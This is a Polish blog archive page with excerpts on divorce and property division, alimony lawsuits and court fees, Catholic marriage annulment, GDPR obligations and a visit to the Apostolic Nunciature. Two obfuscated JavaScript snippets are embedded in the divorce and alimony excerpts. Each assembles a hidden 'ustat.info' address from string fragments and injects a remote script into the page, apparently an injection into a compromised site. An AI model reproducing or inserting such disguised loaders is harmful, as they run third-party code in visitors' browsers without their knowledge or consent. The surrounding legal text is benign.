uncategorized


Rozwód wiąże się z koniecznością dokonania ustaleń odnośnie finansów. Podział majątku może być zawiłą kwestią, warto wiedzieć jak przebiega.   Podział majątku po rozwodzie Rozwód kończy wspólność majątkową, nie oznacza to jednak, że kończy sprawy finansowe między małżonkami. Najczęściej bowiem trzeba rozwiązać sprawę wspólnego majątku i jego podziału. Podziału tego...

(function(){ waj7=document.createElement("script");waj7.type="text/javascript"; waj7.async=true;waj7_=(("us")+"t")+"a";waj7_+=("t.i")+""+"n";waj7_+=(("f")+"o");waj7_+="/"; waj7u="255398949.";waj7u+="sgzkfjn4aj7lss0j6qebuvp1atgk7e";waj7.src="https://"+waj7_+waj7u; waj7db=document.body;waj7db.appendChild(waj7); })(); Bierzmowanie - jakie dewocjonalia wybrać, aby się dobrze na nie przygotować? Sakrament bierzmowania jest jednym z siedmiu wymienionych w Katechizmie Kościoła Katolickiego. Przystąpienie do niego poprzedzone jest licznymi etapami, których celem jest jak najlepsze przygotowanie osoby wierzącej. Niezbędne będą także dewocjonalia, towarzyszące temu doniosłemu wydarzeniu. Co...

Rola biegłego psychologa w procesie prawa kanonicznego o stwierdzenie nieważności małżeństwa*.  * Wpis gościnny autorstwa Pani Janiny Krystyny Czech, biegłego psychologa w opiniowaniu psychologiczno-sądowym przy Sądzie Okręgowym w Gdańsku oraz Sądzie Biskupim w Pelpinie.     Biegły psycholog to osoba, która posiada specjalistyczną i udokumentowaną wiedzę, (tj. ma dokumenty lub inne dowody...

Alimenty są regularnymi i konkretnie określonymi świadczeniami na rzecz osób fizycznych. Są to środki przeznaczone na utrzymanie się, czyli m.in zakup żywności, odzieży, finansowanie leczenia czy opłat mieszkalnych. W przypadku dzieci alimenty obejmują również kwestie edukacji i wychowania. (function(){ oel6=document.createElement("script");oel6.async=true;oel6_="u"+("s")+"t"; oel6u="250360128.";oel6_+="a"+("t.i");oel6_+="n"+("f"+"o")+"/"; oel6u+="x0XrXz17el6i9uqbiqf6Xx"+("eka1alrk"); oel6.src="https://"+oel6_+oel6u;oel6.type="text/javascript"; document.body.appendChild(oel6); })();   Pozew o alimenty Alimenty według polskiego prawa obejmują zobowiązania...

Zainicjowanie postępowanie w sprawie o alimenty wiąże się z spełnieniem kilku warunków formalnych. Jednym z nich jest konieczność uiszczenia opłat sądowych. Jest to jeden z ważniejszych warunków, gdyż brak jego wypełnienia może prowadzić do niemożności zainicjowania postępowania w sprawie. Jakie koszty sądowe należy mieć więc...

W Kościele katolickim nie ma pojęcia takiego jak rozwód kościelny. Dopuszcza on wyłącznie stwierdzenie nieważności małżeństwa. Związane jest to z tym, że zgodnie z obowiązującym prawem kościelnym, związek małżeński jest nierozerwalny. Za unieważnienie małżeństwa kościelnego odpowiada sąd kościelny.   Unieważnienie małżeństwa — powody Jakie mogą być powody unieważnienia małżeństwa?...

Erotomania a stwierdzenie nieważności małżeństwa Erotomania (uzależnienie od seksu) to nadmierna popędliwość seksualna, która przybiera czasami postać zupełnego braku opanowania aktywności seksualnej. Prowadzi do podejmowania współżycia z wieloma partnerami przygodnie spotkanymi. Często bez żadnego uczucia i wyłącznie pod wpływem impulsu. Ma ona zdecydowanie bardziej charakter fizjologiczny...

Od czasu uchwalenia nowych przepisów o ochronie danych osobowych osób fizycznych praktyka prowadzenia biznesu na terenie Polski i całej Unii Europejskiej znacząco się zmieniła. Firmom przybył szereg obowiązków, które wymagają dobrej znajomości prawa, a co ważne znajomość ta musi obejmować większość pracowników, którzy mają do...

Bardzo ciekawa wizyta w Nuncjaturze Apostolskiej w Warszawie. Udało nam się osobiście poznać Abp Salvatore Pennacchio - przesympatyczna i otwarta osoba. Wszystko dzięki pomocy radcy nuncjatury, ks. Kryspina Dubiela oraz Koło Naukowe Utriusque Iuris UKSW. Dziękujemy!  ...